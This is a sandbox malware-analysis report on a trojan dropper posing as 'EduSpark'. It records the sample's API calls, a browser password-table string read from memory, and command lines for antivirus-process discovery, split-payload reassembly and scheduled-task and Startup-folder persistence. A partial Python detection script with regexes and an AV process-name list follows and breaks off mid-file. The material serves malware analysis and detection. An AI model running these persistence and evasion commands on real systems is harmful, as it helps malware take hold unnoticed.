Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 18_2_004D1B4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040348F
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 18_2_004DF20D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 26_2_0045F20D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00406AFA 0_2_00406AFA
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00498017 18_2_00498017
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048E144 18_2_0048E144
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0047E1F0 18_2_0047E1F0
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AA26E 18_2_004AA26E
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004722AD 18_2_004722AD
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004922A2 18_2_004922A2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048C624 18_2_0048C624
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AE87F 18_2_004AE87F
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004FC8A4 18_2_004FC8A4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E2A05 18_2_004E2A05
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004A6ADE 18_2_004A6ADE
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D8BFF 18_2_004D8BFF
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048CD7A 18_2_0048CD7A
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0049CE10 18_2_0049CE10
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004A7159 18_2_004A7159
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00479240 18_2_00479240
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00505311 18_2_00505311
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004796E0 18_2_004796E0
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491704 18_2_00491704
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491A76 18_2_00491A76
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00479B60 18_2_00479B60
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00497B8B 18_2_00497B8B
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491D20 18_2_00491D20
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00497DBA 18_2_00497DBA
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491FE7 18_2_00491FE7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00418017 26_2_00418017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003FE1F0 26_2_003FE1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042A26E 26_2_0042A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F226D 26_2_003F226D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004122A2 26_2_004122A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0040C4B7 26_2_0040C4B7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042E87F 26_2_0042E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0047C8A4 26_2_0047C8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00462A05 26_2_00462A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00426ADE 26_2_00426ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00458BFF 26_2_00458BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0041CE10 26_2_0041CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00427159 26_2_00427159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F9240 26_2_003F9240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00485311 26_2_00485311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003FD380 26_2_003FD380
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F96E0 26_2_003F96E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411704 26_2_00411704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411A76 26_2_00411A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F9B60 26_2_003F9B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00417B8B 26_2_00417B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411D20 26_2_00411D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00417DBA 26_2_00417DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411FE7 26_2_00411FE7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016209E0 26_2_016209E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01604B00 26_2_01604B00
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163EC50 26_2_0163EC50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01626F56 26_2_01626F56
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016213B0 26_2_016213B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163F660 26_2_0163F660
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016040FF 26_2_016040FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01620342 26_2_01620342
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01606320 26_2_01606320
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016068E0 26_2_016068E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016288F9 26_2_016288F9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01622A63 26_2_01622A63
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01620A60 26_2_01620A60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163EF60 26_2_0163EF60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01616E26 26_2_01616E26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01637110 26_2_01637110
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01607192 26_2_01607192
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01601000 26_2_01601000
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01623269 26_2_01623269
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163F2C0 26_2_0163F2C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01601730 26_2_01601730
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0161D7C0 26_2_0161D7C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01603699 26_2_01603699
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0160585F 26_2_0160585F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01605B08 26_2_01605B08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01621B82 26_2_01621B82
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01625A60 26_2_01625A60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0160FA90 26_2_0160FA90
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01603A90 26_2_01603A90
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01607D50 26_2_01607D50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01623C66 26_2_01623C66
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01623C20 26_2_01623C20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01605E23 26_2_01605E23
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: String function: 0048FD52 appears 40 times
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: String function: 00490DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 0040FD52 appears 41 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 01608800 appears 67 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 00410DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 00414CD3 appears 33 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 0160FC30 appears 188 times
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: invalid certificate
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1602918760.000000000291C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeP vs SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@40/36@2/2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E41FA GetLastError,FormatMessageW, 18_2_004E41FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040348F
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 18_2_004D2010
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1A0B AdjustTokenPrivileges,CloseHandle, 18_2_004D1A0B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00452010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 26_2_00452010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00451A0B AdjustTokenPrivileges,CloseHandle, 26_2_00451A0B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404822
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 18_2_004DDD87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_004021A2 CoCreateInstance, 0_2_004021A2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 18_2_004E3A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Double Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File created: C:\Users\user\AppData\Local\Temp\nsfCD33.tmp Jump to behavior
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Buffer.pif, 0000001A.00000003.2039023269.00000000017F3000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038899408.0000000003B45000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MasBathroomsCompoundInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Terminal + Involve + Experiencing + Borders + Deborah + Flip 1181\Y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1181\Buffer.pif 1181\Y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & echo URL="C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MasBathroomsCompoundInjection" Participants Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Terminal + Involve + Experiencing + Borders + Deborah + Flip 1181\Y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1181\Buffer.pif 1181\Y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & echo URL="C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w" Jump to behavior
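The process creations above record a complete batch-dropper chain: the NSIS installer renames a data file to Emotions.cmd and runs it; the batch enumerates processes with tasklist and greps for AV images with findstr /I; it reassembles a split payload with copy /b; it launches a .pif (the dropped file whose version resource reads OriginalFilenameAutoIt3.exe, so an AutoIt runtime) with an extension-less script as argument; it sleeps with ping -n 5 127.0.0.1; and it persists twice, via a schtasks task that runs wscript //B on EduSpark.js every five minutes and via an [InternetShortcut] .url written into the Startup folder. The script below is an added detection example, not part of the Joe Sandbox report: it scores process-creation command lines (Sysmon Event ID 1 / 4688 style) for those stages. The AV image names come from the two findstr lines in the report; the sample command lines are constructed from the process tree shown above, and the three-stage threshold for calling a session a dropper chain is an assumption to tune.

```python
"""Heuristics for the cmd.exe dropper chain recorded in the process list above.

Added example, not part of the Joe Sandbox report. It scans process-creation
command lines (Sysmon Event ID 1 / 4688 style) for the stages the report shows:
tasklist|findstr AV discovery, copy /b chunk reassembly, a .pif launched with a
script file, ping -n sleep, schtasks -> wscript //B persistence and a Startup .url.
The sample lines below are constructed from the report's process tree.
"""
import re

# AV/EDR process names the batch stage greps for; taken from the two findstr
# command lines in the report. Extend with your own tooling's image names.
AV_PROCESS_NAMES = {
    "wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
    "nswscsvc.exe", "sophoshealth.exe",
}

# findstr /I "<names...>" : capture the quoted name list for AV matching.
FINDSTR_RE = re.compile(r'\bfindstr(?:\.exe)?\b.*?/I\s+"([^"]*)"', re.I)

# (tag, regex). Case-insensitive and loose on spacing, as cmd.exe itself is.
RULES = [
    # copy /b A + B + C dest : payload shipped as chunks and reassembled on host
    ("chunked_payload_reassembly",
     re.compile(r'\bcopy\s+/b\s+\S+(?:\s*\+\s*\S+)+\s+\S+', re.I)),
    # a .pif (PE renamed to a legacy shortcut extension) run with an argument;
    # here the AutoIt runtime plus its extension-less compiled script
    ("pif_execution", re.compile(r'\.pif"?\s+\S', re.I)),
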